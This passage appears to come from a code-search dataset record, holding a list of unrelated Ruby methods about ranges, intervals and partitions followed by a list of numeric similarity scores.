"def origin\n range.low\n end",
"def range(*args)\n value = \"[\"\n args.each_slice(2) do |from, to|\n from = sanitize(from)\n to = sanitize(to)\n value += \"#{from}-#{to}\"\n end\n value += \"]\"\n append value\n end",
"def between from_key, to_key\n from(from_key).to(to_key, inclusive: true)\n end",
"def get_range(range)\n r = []\n enum = range.to_enum\n begin\n while (x = enum.next) < @size\n r << get_single_key(x)\n end\n rescue StopIteration\n end\n r.empty? ? nil : r\n end",
"def relevant_range\n if (first_partition = current_partitions.min)\n # Case 1: First partition starts with MINVALUE, i.e. from is nil -> start with first real partition\n # Case 2: Rather unexpectedly, first partition does not start with MINVALUE, i.e. from is not nil\n # In this case, use first partition beginning as a start\n min_date = first_partition.from || first_partition.to\n end\n\n if pruning_old_partitions?\n min_date ||= oldest_active_date\n end\n\n # In case we don't have a partition yet\n min_date ||= Date.today\n min_date = min_date.beginning_of_month\n\n max_date = Date.today.end_of_month + HEADROOM\n\n [min_date, max_date]\n end",
"def size_range(range)\n return [1,1] if range.nil?\n from = range.from\n to = range.to\n x = from.nil? ? 1 : from\n y = to.nil? ? TheInfinity : to\n [x, y]\n end",
"def map_value(val, from_range, to_range)\n orig_range = [1, (from_range[1] - from_range[0]).abs].max\n new_range = [1, (to_range[1] - to_range[0]).abs].max\n\n ((val.to_f - from_range[0]) / orig_range) * new_range + to_range[0]\n end",
"def maps_for_range(range)\n last = (range.exclude_end?) ? range.last : range.last + 1\n maps.select { |m| m.start_addr >= range.first and m.max < last }\n end",
"def restrict(value, range)\n [[value, range.first].max, range.last].min\n end",
"def get_range(key1, key2)\n @store_.get_range(key1, key2)\n end",
"def range(column)\n min(column)..max(column)\n end",
"def timestamp_range from, to\n range_grpc = Google::Cloud::Bigtable::V2::TimestampRange.new\n range_grpc.start_timestamp_micros = from if from\n range_grpc.end_timestamp_micros = to if to\n @grpc.timestamp_range_filter = range_grpc\n self\n end",
"def span\n span_min = @locations.min { |a,b| a.from <=> b.from }\n span_max = @locations.max { |a,b| a.to <=> b.to }\n return span_min.from, span_max.to\n end",
"def report_range\n return @report_range\n end",
"def getIndexRange()\n rangeTime = { :min => nil, :max => nil} ;\n rangeX = { :min => nil, :max => nil} ;\n rangeY = { :min => nil, :max => nil} ;\n rangeZ = { :min => nil, :max => nil} ;\n @sumGridTable.keys.sort.each{|index|\n rangeTime[:min] = safeMin(index[0], rangeTime[:min]) ;\n rangeTime[:max] = safeMax(index[0], rangeTime[:max]) ;\n rangeX[:min] = safeMin(index[1][0], rangeX[:min]) ;\n rangeX[:max] = safeMax(index[1][0], rangeX[:max]) ;\n rangeY[:min] = safeMin(index[1][1], rangeY[:min]) ;\n rangeY[:max] = safeMax(index[1][1], rangeY[:max]) ;\n rangeZ[:min] = safeMin(index[1][2], rangeZ[:min]) ;\n rangeZ[:max] = safeMax(index[1][2], rangeZ[:max]) ;\n }\n return [rangeTime, rangeX, rangeY, rangeZ] ;\n end",
"def get_range_parts(range)\n if range =~ /([' a-zA-Z]+!)?([A-Z]+\\d+):([A-Z]+\\d+)/\n sheet = $1\n range1 = $2\n range2 = $3\n if sheet\n sheet = sheet[0..sheet.size-2]\n if sheet =~ /'(.+)'/\n sheet = $1\n end\n end\n return [sheet, range1, range2]\n end\n nil\n end",
"def interval(from, to)\n return EmptyList if from > to\n interval_exclusive(from, to.next)\n end",
"def split(range = nil)\n if self.record_category and self.activity?\n entry_end = self.end_timestamp || Time.now\n time = range ? [self.timestamp, range.begin.midnight.in_time_zone].max : self.timestamp\n end_time = range ? [entry_end, range.end.midnight.in_time_zone].min : entry_end\n list = Array.new\n while time < end_time\n new_end = [entry_end, (time + 1.day).midnight.in_time_zone].min\n list << [time, new_end, self]\n time = new_end\n end\n else\n return [self.timestamp, nil, self]\n end\n list\n end",
"def interval\n @to.to_i - @from.to_i\n end",
"def selection_range\n attributes.fetch(:selectionRange)\n end",
"def to_a\n get_range('-inf', '+inf', include_boundaries: true)\n end",
"def emit_range\n emit_finish_mutations\n emit_start_mutations\n end",
"def to_range_within(range)\n nb_weeks_offset = self.weekly_recurring ? ((range.end - self.starts_at.to_datetime) / 7).to_i : 0\n r = Range.new(self.starts_at + nb_weeks_offset.week, self.ends_at + nb_weeks_offset.week)\n range.cover?(r.begin)&&range.cover?(r.end) ? r : nil\n end",
"def get_range_by_rank(from, to, options = {})\n connection.zrevrange(key_label, from, to, options)\n end",
"def range(range_start, range_end, end_reached_cb=nil)\n if range_start == nil\n result = XML.new(name, attrs)\n else\n result = nil\n end\n @contents.each {|c|\n # end reached !\n if range_end and c.object_id == range_end.object_id\n end_reached_cb.call if end_reached_cb\n break\n end\n # start reached !\n if range_start and c.object_id == range_start.object_id\n result = XML.new(name, attrs)\n next\n end\n if result # We already started\n if c.is_a? XML\n break_me = false\n result.add! c.range(nil, range_end, lambda{ break_me = true })\n if break_me\n end_reached_cb.call if end_reached_cb\n break\n end\n else # String/XML_PI/XML_Comment\n result.add! c\n end\n else\n # Strings/XML_PI/XML_Comment obviously cannot start a range\n if c.is_a? XML\n break_me = false\n r = c.range(range_start, range_end, lambda{ break_me = true })\n if r\n # start reached !\n result = XML.new(name, attrs, r)\n end\n if break_me\n # end reached !\n end_reached_cb.call if end_reached_cb\n break\n end\n end\n end\n }\n return result\n end",
"def ranges\n @toc_id = 'ranges'\n end",
"def parsed_range(splits)\n last_tuple = splits.pop\n body_of(splits) + head_of(last_tuple)\n end"
] |
[
"0.7436858",
"0.72955906",
"0.72890246",
"0.69145817",
"0.6898283",
"0.68982786",
"0.68723494",
"0.68503475",
"0.6847249",
"0.6791602",
"0.6756868",
"0.6735238",
"0.6723739",
"0.6713718",
"0.6713718",
"0.6713718",
"0.6713718",
"0.66967636",
"0.6638313",
"0.66310805",
"0.6552379",
"0.6547579",
"0.65333164",
"0.65282995",
"0.65166855",
"0.64559317",
"0.6454633",
"0.6398449",
"0.63866156",
"0.63866156",
"0.63866156",
"0.6351912",
"0.63272804",
"0.63260055",
"0.6315781",
"0.6307502",
"0.62840307",
"0.62818086",
"0.62480646",
"0.6244088",
"0.62085193",
"0.6200179",
"0.6192482",
"0.6173063",
"0.61647415",
"0.6158994",
"0.6158994",
"0.6158994",
"0.6138675",
"0.6129658",
"0.612753",
"0.61231935",
"0.6122466",
"0.6087128",
"0.6087128",
"0.6082675",
"0.6080066",
"0.60667187",
"0.60589683",
"0.60539377",
"0.6030097",
"0.6029009",
"0.6029009",
"0.60081536",
"0.6004633",
"0.59996605",
"0.5998494",
"0.59883386",
"0.5988088",
"0.59850913",
"0.59698945",
"0.5969657",
"0.59676313",
"0.59563804",
"0.5953022",
"0.59421706",
"0.59384173",
"0.593453",
"0.5927297",
"0.5910727",
"0.58984536",
"0.5895067",
"0.587422",
"0.58740896",
"0.58711505",
"0.58701235",
"0.5854783",
"0.5854187",
"0.5852956",
"0.5851221",
"0.5841029",
"0.58396715",
"0.5838297",
"0.5832576",
"0.5829179",
"0.58199775",
"0.58134663",
"0.5798695",
"0.57854927",
"0.578399"
] |
0.81356955
|
0
|
The values to include in this partition for a list partition.
|
def list
@in
end
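
A companion sketch for the list case, under the same caveats; the values_in writer that populates @in is an assumption, only list itself comes from the row above.

# Hedged sketch: the writer is assumed, not taken from the source row.
class ListPartitionSketch
  # Assumed writer collecting the allowed values into @in.
  def values_in(*values)
    @in = values
  end

  # The values to include in this partition for a list partition.
  def list
    @in
  end
end

gen = ListPartitionSketch.new
gen.values_in 'a', 'b', 'c'
gen.list # => ["a", "b", "c"]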
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def GetPartitionList\n deep_copy(@partition_info)\n end",
"def partition_list()\nend",
"def sites\n @list.map {|partition_name, partition| partition.sites.map {|site| {site => partition_name} }}.flatten(1)\n end",
"def all\n @list.values\n end",
"def values\n @values ||= []\n end",
"def values\n end",
"def values\n @values ||= []\n end",
"def values; end",
"def values; end",
"def values; end",
"def values; end",
"def values; end",
"def values; end",
"def values; end",
"def values() end",
"def values\n []\n end",
"def values\n entries.map {|e| e.value }\n end",
"def values\n @values\n end",
"def values\n self\n end",
"def values\n return @values\n end",
"def values\n return @values\n end",
"def values\n return @values\n end",
"def values\n self[:values]\n end",
"def list_values(bn, lists)\n raise \"no list\" unless lists.has_key?(bn)\n first, rest = lists[bn][RDF.first], lists[bn][RDF.rest]\n (rest == RDF.nil ? [] : list_values(rest, lists)).unshift(first)\n rescue\n lists.delete(bn)\n raise $!\n end",
"def parts\n unless defined?(@parts)\n @parts = values_array\n @parts.pop while @parts.size > 1 && @parts.last == 0\n end\n @parts\n end",
"def values\n @@values\n end",
"def values\n end",
"def values\n list = []\n each_value{|value| list << value}\n list\n end",
"def items\n @lists.collect(&:items).flatten\n end",
"def partition(&block)\n return to_enum :partition unless block\n\n ary_T = []\n ary_F = []\n self.each{|*val|\n if block.call(*val)\n ary_T.push(val.__svalue)\n else\n ary_F.push(val.__svalue)\n end\n }\n [ary_T, ary_F]\n end",
"def values(*) end",
"def values\n @values.values\n end",
"def values(listed=nil, &filter)\n listed ||= names(&filter)\n listed.collect { |name| load(name) }\n end",
"def values\n @values.values\n end",
"def partition(&block) # :nodoc:\n resolve\n result = @items.partition(&block)\n [\n PropertyGroup::PathList.new.import(result[0]),\n PropertyGroup::PathList.new.import(result[1]),\n ]\n end",
"def values\n @ledger.values\n end",
"def list\n @table.keys # values\n end",
"def values\n @values\n end",
"def values\n @values\n end",
"def values\n @values.values\n end",
"def values\n vals = []\n each{|k,v| vals << v}\n vals\n end",
"def values\n @data.values\n end",
"def value_set()\n values = self.values\n values.each { |elt| raise \"not a list! #{elt}\" if !elt.is_a?(Array) and !elt.is_a?(Set) }\n return self.values.reduce(Set.new) { |sum,nex| sum | nex }\n end",
"def values\n fields.map { |f| f.value }\n end",
"def sections\n self.entries.select { |e| e.is_a?(ListSection) }\n end",
"def active_value_list\n @value_lists[@active_value_list_identifier]\n end",
"def ordered_values; end",
"def get_list\n\n @context.storage.get_configuration('participant_list') ||\n { 'type' => 'configurations',\n '_id' => 'participant_list',\n 'list' => [] }\n end",
"def resource_records\n if !@value.nil?\n @value.map { |v| { value: v } }\n end\n end",
"def list=(value)\n @list = value\n end",
"def list\n return @list\n end",
"def entries\n @list\n end",
"def values\n rows.map{|r| r.value}\n end",
"def values\n\n self.to_h.values\n end",
"def list\n @@list\n end",
"def partitions\n topics.values.flat_map(&:partitions)\n end",
"def selected_values &block\n ar = []\n selected_rows().each do |i|\n val = @list[i]\n if block_given?\n yield val\n else\n ar << val\n end\n end\n return ar unless block_given?\n end",
"def values\n @store.all_values\n end",
"def list\n return @lists\n end",
"def shared_list_values\n list_value_custom_fields_enabled_on_project = CustomField.enabled_on_project(self).where(:field_format => 'project_list_value')\n\n if new_record?\n ::ProjectEnumeration.\n joins(:project).\n preload(:project, :custom_field).\n for_list_values.\n where(\"#{Project.table_name}.status <> ? AND #{::ProjectEnumeration.table_name}.sharing = 'system'\", ::Project::STATUS_ARCHIVED).\n where(:custom_field_id => list_value_custom_fields_enabled_on_project).\n order_by_custom_field_then_position\n else\n @shared_list_values ||= begin\n r = root? ? self : root\n ::ProjectEnumeration.\n joins(:project).\n preload(:project, :custom_field).\n for_list_values.\n where(\"#{Project.table_name}.id = #{id}\" +\n \" OR (#{Project.table_name}.status <> #{::Project::STATUS_ARCHIVED} AND (\" +\n \" #{::ProjectEnumeration.table_name}.sharing = 'system'\" +\n \" OR (#{Project.table_name}.lft >= #{r.lft} AND #{Project.table_name}.rgt <= #{r.rgt} AND #{::ProjectEnumeration.table_name}.sharing = 'tree')\" +\n \" OR (#{Project.table_name}.lft < #{lft} AND #{Project.table_name}.rgt > #{rgt} AND #{::ProjectEnumeration.table_name}.sharing IN ('hierarchy', 'descendants'))\" +\n \" OR (#{Project.table_name}.lft > #{lft} AND #{Project.table_name}.rgt < #{rgt} AND #{::ProjectEnumeration.table_name}.sharing = 'hierarchy')\" +\n \"))\").\n where(:custom_field_id => list_value_custom_fields_enabled_on_project).\n order_by_custom_field_then_position\n end\n end\n end",
"def entries\n ary = []\n self.each{|*val|\n # __svalue is an internal method\n ary.push val.__svalue\n }\n ary\n end",
"def values(except: [])\n return nil unless pivot.is_a?(Array) && pivot.present?\n\n params = search_state.params\n # values should have at most one terminal blank pivot\n pivot_values = pivot.map { |k| Array(params.dig(:f, k)) || STOP_VALUE }\n pivot_values = pivot_values[0..(pivot_values.index(STOP_VALUE) || -1)]\n # put an explicit nil in for the matrix\n pivot_values[-1] = [nil] if pivot_values.last == STOP_VALUE\n top_level_values = pivot_values.shift\n return [] if top_level_values.first.blank?\n\n pivot_values.each { |pivot_value| pivot_value[0] ||= nil }\n matrix_values = top_level_values.product(*pivot_values)\n matrix_values.map do |vals|\n PivotValue.new(value: vals.shift, fq: pivot[1..].map(&:to_sym).zip(vals).to_h)\n end\n end",
"def init_value_list \n unless @value_list.nil?\n @value_list = manager_send(:GetValueListItems, self)\n end\n end",
"def _values\n _data.merge(kept_data)\n end",
"def list_data\n _check_and_get(@_data, Array)\n end",
"def values\n @hash.values\n end",
"def values\n if node_type == :leaf\n [payload]\n else\n payload.values\n end\n end",
"def get_list_items\n get_field_config['items']\n end",
"def values\n @hash.values\n end",
"def values\n @values ||= MapscriptEnumerable.new(self, :numvalues, :getValue)\n end",
"def acquire_element_array_list\n element_array_list = []\n (0..7).each do |number|\n element_file_name = ELEMENT_FILE_PREFIX + number.to_s + TEXT_FILE_SUFFIX\n element_array = File.read(element_file_name)\n element_array_list[number] = element_array.split(EXPORT_LIST_SEPARATOR)\n end\n element_array_list\n end",
"def index\n @value_lists = ValueList.all\n end",
"def index\n @list_values = ListValue.all\n end",
"def available_values\n result = []\n for i in (0 .. @tag.length - 1)\n result << @tag[i].value\n end\n return result\n end",
"def available_values\n result = []\n for i in (0 .. @tag.length - 1)\n result << @tag[i].value\n end\n return result\n end",
"def list\n @list\n end",
"def returnList\n\t\telements = []\n\t\tcurrent = @head\n\t\twhile current != nil\n\t\t\telements << current.value\n\t\t\tcurrent = current.nnode\n\t\tend\n\t\treturn elements\n\tend",
"def values_array\n @_field_path.map{ |field_| @_values[field_.name] }\n end",
"def values\n @heap.values\n end",
"def collect\n [@range_low, @range_high]\n end",
"def lists\n @lib.lists\n end",
"def get_values()\n\t\t\treturn @config.values\n\t\tend",
"def list\n @list ||= []\n end",
"def list\n @list ||= []\n end",
"def hash\n lists.inject({}){ |hash, p| hash[p[0]] ||= []; hash[p[0]] << p[1]; hash }\n end",
"def list\n @List\n end",
"def all\n new_list = self.class.new\n origins.each do |origin|\n origin.items.each do |item, int_value|\n new_list.list[item] = int_value\n end\n end\n\n new_list\n end",
"def values\n self.map('lambda{|(_, value)| value}')\n end",
"def print_layout_water_content_list_items\n [{ code: :naturally_occurring, lookup: true },\n { code: :naturally_occurring_percentage, when: :naturally_occurring?, is: [true] },\n { code: :waste_percentage },\n { code: :added_water_percentage }]\n end",
"def foreign_keys(*partition_key_values)\n return collect_from_collection(*partition_key_values, &:foreign_keys).inject(Set.new) do |set,new_items|\n if new_items.is_a? Array\n set += new_items\n else\n set += [new_items]\n end\n set\n end\n end",
"def values(range = nil)\n result_unflatten = if !::RANGES_JRUBY_BUG\n map { |x| x.v }\n else\n self.v\n end\n result = result_unflatten.flatten\n if range\n relevant_result = []\n result.each_with_index { |row_or_column, i| relevant_result << row_or_column if range.include?(i) }\n relevant_result\n else\n result\n end\n end",
"def partitions( partition_count, &proc )\n Enumerable.partition_sizes( self.size, partition_count ) do |partition|\n partitioned_collection = []\n consumed_so_far = 0\n partition.each do |partition_size|\n partitioned_collection << self[ consumed_so_far, partition_size ]\n consumed_so_far += partition_size\n end\n yield partitioned_collection\n end\n end",
"def data_values\n if bare_data_set?\n [data]\n else\n data.map{ |set| set.is_a?(Hash) ? set[:values] : set }\n end\n end",
"def values\n @children\n end",
"def values; distinct_values.map(&:value).compact; end",
"def partition_types_ext\n ptr1 = MemoryPointer::new( :size_t, 1)\n error = OpenCL.clGetDeviceInfo(self, PARTITION_TYPES_EXT, 0, nil, ptr1)\n error_check(error)\n ptr2 = MemoryPointer::new( ptr1.read_size_t )\n error = OpenCL.clGetDeviceInfo(self, PARTITION_TYPES_EXT, ptr1.read_size_t, ptr2, nil)\n error_check(error)\n arr = ptr2.get_array_of_cl_device_partition_property_ext(0, ptr1.read_size_t/ OpenCL.find_type(:cl_device_partition_property_ext).size)\n arr.reject! { |e| e == 0 }\n return arr.collect { |e| PartitionEXT::new(e.to_i) }\n end",
"def property_list(name, type, required, description = nil, allowed_values = [], hash = {})\n hash.merge!({allowable_values: {value_type: \"LIST\", values: allowed_values}})\n property(name, type, required, description, hash)\n end",
"def values(include_deleted = false)\n include_deleted && @values || (@values.select { |v| !v.deleted? })\n end",
"def fields #:nodoc:\n f = @properties.to_a\n last = f.pop\n f.push @elements\n f.push last\n end",
"def parts\n @parts\n end"
] |
[
"0.6419158",
"0.5873987",
"0.5651121",
"0.5589368",
"0.5561751",
"0.5551433",
"0.554591",
"0.5534171",
"0.5534171",
"0.5534171",
"0.5534171",
"0.5534171",
"0.5534171",
"0.5534171",
"0.55264807",
"0.5521307",
"0.54976195",
"0.54662544",
"0.5450633",
"0.54149896",
"0.5413755",
"0.5413755",
"0.5388153",
"0.53491133",
"0.53288317",
"0.5322811",
"0.52833897",
"0.5268636",
"0.52580714",
"0.5255133",
"0.5244333",
"0.52378505",
"0.5226306",
"0.52195835",
"0.52187645",
"0.52143943",
"0.5200189",
"0.5198643",
"0.5198643",
"0.5188169",
"0.5188129",
"0.51865566",
"0.5173547",
"0.5166076",
"0.51610625",
"0.5141641",
"0.5128332",
"0.5124649",
"0.51228225",
"0.5114901",
"0.5108269",
"0.5107722",
"0.5085095",
"0.50758445",
"0.50695616",
"0.50682926",
"0.5063489",
"0.5057818",
"0.50320923",
"0.50213444",
"0.5020547",
"0.5005196",
"0.50046855",
"0.50013435",
"0.4996651",
"0.49959522",
"0.49877143",
"0.49666888",
"0.495004",
"0.49388355",
"0.49291036",
"0.4926703",
"0.492404",
"0.49182183",
"0.49182183",
"0.4917392",
"0.49158925",
"0.48914507",
"0.48751768",
"0.4874845",
"0.48699397",
"0.4864632",
"0.4855787",
"0.4855787",
"0.48534164",
"0.48495165",
"0.484134",
"0.48326117",
"0.4828888",
"0.4826976",
"0.48238543",
"0.48158768",
"0.481189",
"0.48114213",
"0.4777057",
"0.47753403",
"0.47746727",
"0.47672638",
"0.47633964",
"0.4762562"
] |
0.48294732
|
88
|
The modulus and remainder to use for this partition for a hash partition.
|
def hash_values
[@modulus, @remainder]
end
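
The same style of sketch for the hash case; the modulus/remainder writers are assumptions, only hash_values itself comes from the row above. In PostgreSQL terms, a hash partition with modulus 4 and remainder 0 receives every row whose hashed partition key is congruent to 0 mod 4.

# Hedged sketch: the writers are assumed, not taken from the source row.
class HashPartitionSketch
  # Assumed writer for the hash modulus.
  def modulus(value)
    @modulus = value
  end

  # Assumed writer for the hash remainder.
  def remainder(value)
    @remainder = value
  end

  # The modulus and remainder to use for this partition for a hash partition.
  def hash_values
    [@modulus, @remainder]
  end
end

gen = HashPartitionSketch.new
gen.modulus 4
gen.remainder 0
gen.hash_values # => [4, 0]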
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def modulo(p0) end",
"def modulus(v)\n @modulus = v\n end",
"def remainder(val); end",
"def modulo(other)\n self % other\n end",
"def remainder(p0) end",
"def modulus\n distance_to(origin)\n end",
"def divmod(p0) end",
"def mod(first_number, second_number)\n first_number % second_number\nend",
"def divmod(val); end",
"def my_modulo(dividend, divisor)\r\n # your code goes here\r\n # use of modulo operator\r\n\r\n dividend % divisor\r\nend",
"def modulo(other)\n Modulo.new(self, other)\n end",
"def modulo_of(fraction); end",
"def modulo(arg0)\n end",
"def modulo(arg0)\n end",
"def get_remainder(num1,num2)\n num1%num2\nend",
"def modulus\n\tputs (5%3)\n\tputs ( -5 % 3)\n\tputs (5 % 3)\n\tputs (-5 % -3)\n\nend",
"def modulo(dividend, divisor)\n puts \"#{dividend} % #{divisor} = #{dividend.modulo(divisor)}\\n\"\nend",
"def mod(n, m)\n return ((n % m) + m) % m\nend",
"def modulus(d, e)\n puts \"MODULUS #{d} % #{e}\"\n return d % e\nend",
"def mod11(number); end",
"def rehash(oldhash, size)\n (oldhash + 1) % size\n end",
"def remainder(v)\n @remainder = v\n end",
"def mod(num1, num2)\n num2.to_f % num1.to_f;\nend",
"def hashfunction(key, size)\n #key.hash % size\n key % size\n end",
"def modular_function\n num_1 % num_2\n return num_1 % num_2\nend",
"def kidmod10(base); end",
"def hash\n excl = @excl ? 1 : 0\n hash = excl\n hash ^= @begin.hash << 1\n hash ^= @end.hash << 9\n hash ^= excl << 24;\n # Are we throwing away too much here for a good hash value distribution?\n return hash & Fixnum::MAX\n end",
"def divmod(arg0)\n end",
"def divmod(arg0)\n end",
"def calculate_hash(input, prep_hashes)\n result = 0\n input.unpack('U*').each do |x|\n result += prep_hashes.hash(x)\n end\n (result % MOD_VALUE).to_s(HEX)\nend",
"def saveThePrisoner(n, m, s)\n mod = (m % n == 0) ? n : (m % n)\n return ((mod + s -1) % n == 0) ? n : (mod + s -1) % n\n\nend",
"def position(x) #x will be the Hashable object\r\n return x.hashvalue % @size\r\n end",
"def divisor_plus_remainder(big_int, small_int)\n big_int / small_int + big_int % small_int\nend",
"def saveThePrisoner(n, m, s)\n res = ((m - 1) + s) % n\n res == 0 ? n : res \nend",
"def mod(a, b)\n a % b\n c = a % b\n puts \" the remainder of #{a} divided by #{b} is #{c}\"\nreturn c\nend",
"def remainder(arg0)\n end",
"def modulo(y)\n mod(y, ZERO)\n end",
"def hash_this(word)\n\t\tdigest = Digest::MD5.hexdigest(word) # get the hex version of the MD5 for the specified string\n\t\tdigest[@offset, @digits].to_i(16) % @max_value # offset it using the initial seed value and get a subset of the md5. then modulo it to get the bit array location\n\tend",
"def index(key, size)\n return key.sum % size \n end",
"def index(key, size)\n return key.sum % size\n end",
"def inverse_modulo(n)\n\t\treturn nil unless self.gcd(n) == 1\n\t\t(n.extended_gcd(self).last) % n\n\tend",
"def inv_mod x,n\n d,r,s = gcd2 x,n\n if d==1\n r % n\n else\n 0\n end\nend",
"def index(key, size) #take the asscii value % size to come up with index\n total = 0\n key.each_byte do |c|\n total = c + total\n end\n total % size\n\n end",
"def mod\n x, y = stack.pop(2)\n push x % y\n end",
"def calculate_random_partitioner_token(key)\n number = Digest::MD5.hexdigest(key).to_i(16)\n\n if number >= (2**127)\n # perform two's complement, basically this takes the absolute value of the number as\n # if it were a 128-bit signed number. Equivalent to Java BigInteger.abs() operation.\n result = (number ^ (2**128)-1) + 1\n else\n # we're good\n result = number\n end\n\n result\n end",
"def division_plus_remainder(big_number, small_number)\n (big_number / small_number) + (big_number % small_number)\n end",
"def index(key, size)\n # Look into this. Same as previous ???\n # Review the base of tens to get a better understanding.\n return key.sum % size\n end",
"def index(key, size)\n return key.sum % size\n end",
"def index(key, size)\n return key.sum % size\n end",
"def index(key, size)\n return key.sum % size\n end",
"def index(key, size)\n return key.sum % size\n end",
"def H(n, *a)\n nlen = 2 * (((n.to_hex_string).length * 4 + 7) >> 3)\n hashin = a.map {|s|\n next unless s\n shex = s.class == String ? s : s.to_hex_string\n if shex.length > nlen\n raise 'Bit width does not match - client uses different prime'\n end\n '0' * (nlen - shex.length) + shex\n }.join('')\n sha512_hex(hashin).hex % n\n end",
"def index(key, size)\n #true_index = hash(key) % k\n code = 0\n key.split(%r{\\s*}).each do |letter|\n code += letter.ord \n end\n puts code\n return code % size\n\n end",
"def my_remainder(a, b)\n\treturn nil if a == 0 || b == 0\n\treturn a.abs % b.abs if a.abs >= b.abs\n\treturn b.abs % a.abs if b.abs > a.abs\nend",
"def hash\r\n a = 0\r\n @id.each_byte {|c| a += c.to_i}\r\n (a + @paired.to_i) * HASH_PRIME\r\n end",
"def modulo(x, y)\n if y == 0\n return \"Psst. You can't divide by zero. Please try again.\"\n else\n return x % y\n end\nend",
"def is_divisible_using_hashing(arr, k)\n n = arr.length\n hsh = {}\n # collect reminders and their occurences\n for i in 0...n\n if hsh[arr[i] % k]\n hsh[arr[i] % k] += 1\n else\n hsh[arr[i] % k] = 1 \n end \n end\n\n # traverse array again to check reminders with following possiblities\n # 1. if reminder is 0, then its occurence must be > 1\n # 2. if reminder divides k in two halves, then its occurence must be > 1\n # 3. if reminder occurence is same as k - reminder occurence\n\n for i in 0...n\n rem = arr[i] % k\n if rem * 2 == k || rem == 0\n if hsh[rem] == 1\n return false\n end \n else\n if hsh[rem] != hsh[k-rem]\n return false\n end \n end \n end \n true\nend",
"def p003(total_remaining = 600_851_475_143)\n divisor = 2\n until divisor >= total_remaining\n if (total_remaining % divisor).zero?\n total_remaining /= divisor\n else\n divisor += 1\n end\n end\n divisor\nend",
"def modulus(a, b)\n return \"If you divide #{a} and #{b} you will get the remainer #{a%b}.\"\nend",
"def mod(signal)\n self.class.new(self, signal) { |a, b| a % b }\n end",
"def magic_alignement()\n\t\tdt = @buswi[0][0]\n\t\tokb = [@buswi[0]]\n\n\t\tremb = @buswi[1..].clone\n\t\tt=0\n\t\tloop do \n\t\t\tt = t + dt\n\t\t\tokb=[]\n\t\t\tremb.each do |p,i|\n\t\t\t\tif (t+i)%p == 0\n\t\t\t\t\tdt = dt.lcm(p)\n\t\t\t\t\tokb << [p,i]\n\t\t\t\tend\n\t\t\tend\n\t\t\tremb = remb - okb\n\t\t\tbreak if remb.empty?\n\t\tend\n\t\tt\n\tend",
"def index(key, size)\n i = key.sum % size \n end",
"def get_lh_hash(key)\n res = 0\n key.upcase.bytes do |byte|\n res *= 37\n res += byte.ord\n end\n return res % 0x100000000\n end",
"def s1 num\n\tnum % 2\nend",
"def div_h_p_nr(a,b)\n p = 0\n\n @bits.times do\n if p < 0\n # (i-a) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-a) p=p+b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p += b\n else\n # (i-b) shift combined pa register left one bit\n pa = ((p<<@bits)|a)<<1\n # (ii-b) p=p-b\n a = pa & @mA\n p = signed((pa & @mP) >> @bits)\n p -= b\n if (p < 0)\n# Tests pass if the following is uncommented\n# # (iv) restore p\n# p += b\n else\n # (iii) if p >= 0\n a |= 1\n end\n end\n end\n # FIXME - need a test case that exercises this last step\n if p < 0\n p += b\n end\n [lo(a),lo(p)]\n end",
"def hash\n num = @high << 64\n num |= @low\n num.hash\n end",
"def __remainder=(v) # only keep relevant bits of the remainder\n if v != 0\n num_bits = self.class.type.size * 8\n num_used_bits = self.class.map.value.collect { |v, _, _| v }.select { |v| v > 0 }.sum(:+)\n if num_used_bits < num_bits\n v &= ((( 1 << (num_bits - num_used_bits)) - 1) << num_used_bits)\n else\n v = 0\n end\n end\n @__remainder = v\n end",
"def remainder(y)\n z = modulo(y)\n if !z.zero? && ((self < 0 && y > 0) || (self > 0 && y < 0))\n z - y\n else\n z\n end\n end",
"def s1 number\n number % 2\nend",
"def index(key, size)\n return key.sum%size\n end",
"def index(key, size)\n total_sum = 0\n key.each_byte do |x|\n total_sum += x\n end\n return total_sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def partition_proposition(proposition)\n @remainder &= proposition\n @left &= proposition\n @right &= proposition\n end",
"def index(key, size)\n key.sum % size \n end",
"def index(key, size)\n key.sum % size \n end",
"def get_hash(str, elem_num)\n tmp = 0\n s = str.unpack(\"C*\")\n for i in 1..s.size\n tmp += s[i-1]\n end\n return tmp % elem_num\n end",
"def pc_int_inv(a,mod=12)\n return (12-a)%mod\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end",
"def index(key, size)\n key.sum % size\n end"
] |
[
"0.6920085",
"0.6797567",
"0.674929",
"0.6711626",
"0.66135556",
"0.6557639",
"0.6499426",
"0.6435647",
"0.64005387",
"0.6293782",
"0.61620873",
"0.61104375",
"0.60770786",
"0.60770786",
"0.6060377",
"0.6050155",
"0.6028834",
"0.60186404",
"0.6014417",
"0.5994006",
"0.59627205",
"0.5954547",
"0.59105915",
"0.58995056",
"0.5867977",
"0.58317673",
"0.57877356",
"0.57697755",
"0.57697755",
"0.57475424",
"0.574595",
"0.57198334",
"0.5694534",
"0.5674358",
"0.56653774",
"0.56248045",
"0.56200635",
"0.5605526",
"0.56038576",
"0.55959046",
"0.5593711",
"0.55884653",
"0.558231",
"0.5574421",
"0.5562271",
"0.5555954",
"0.55487907",
"0.55352855",
"0.55352855",
"0.55352855",
"0.55352855",
"0.5528424",
"0.55100906",
"0.5508569",
"0.55060786",
"0.5502757",
"0.5501668",
"0.5482544",
"0.54785997",
"0.5478472",
"0.54517716",
"0.54505527",
"0.54359984",
"0.54349226",
"0.5431876",
"0.5426708",
"0.5424879",
